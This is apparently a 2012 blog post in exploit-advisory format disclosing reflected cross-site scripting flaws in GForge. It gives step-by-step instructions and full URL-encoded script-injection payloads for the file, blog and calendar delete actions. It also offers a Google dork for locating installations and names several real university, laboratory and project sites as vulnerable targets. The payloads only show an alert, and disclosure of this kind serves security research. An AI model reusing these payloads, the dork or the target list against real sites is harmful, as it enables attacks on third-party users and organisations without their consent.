luni, 30 ianuarie 2012

GForge Cross Site Scripting

# Exploit Title: GForge Cross Site Scripting
# Date: 30.01.2012
# Author: Sony

# Software Link: http://gforge.org
# Google Dorks: inurl:gf/user/ site:edu (gov,com,org,etc..) or another dorks (it's simple)
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:

http://st2tea.blogspot.com/2012/01/gforge-cross-site-scripting.html
..................................................................


Well, we have interesting xss in the GForge.

But we can test it on our accounts. We can made 2 accounts for test.

XSS found in the files,calendar,messagewall (search users), blogs..

Files.


Upload our file.

http://gforge.org/gf/user/eleo/userfiles/

And press button delete and open link in the new window and add in the url our xss.


http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[our xss is here]
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


Test this on your account name.

Well, now..blog.

Create post and press button delete and open link in the new window and add in the url our xss.


gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2[xss is here]
http://gforge.org/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

or..


Calendar..

Open calendar and press button "add new event" and press button delete and open link in the new window and add in the url our xss.


http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[our xss is here]

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E


And we have xss in the gf/my/messagewall/ (search users)



Also we can see in google that a lot of sites have a gforge and vulnerable to xss.

Joomlacode.org


Stanford.edu



https://code.ros.org/gf/account/?action=UserAdd
https://forge.si.umich.edu/gf/account/?action=UserAdd
http://media.lbl.gov/gf/account/?action=UserAdd
etc..


It's not a critical vulnerability, but it's possible to use if to change url for different users.

0 comentarii:

Trimiteți un comentariu

Rețineți: Numai membrii acestui blog pot posta comentarii.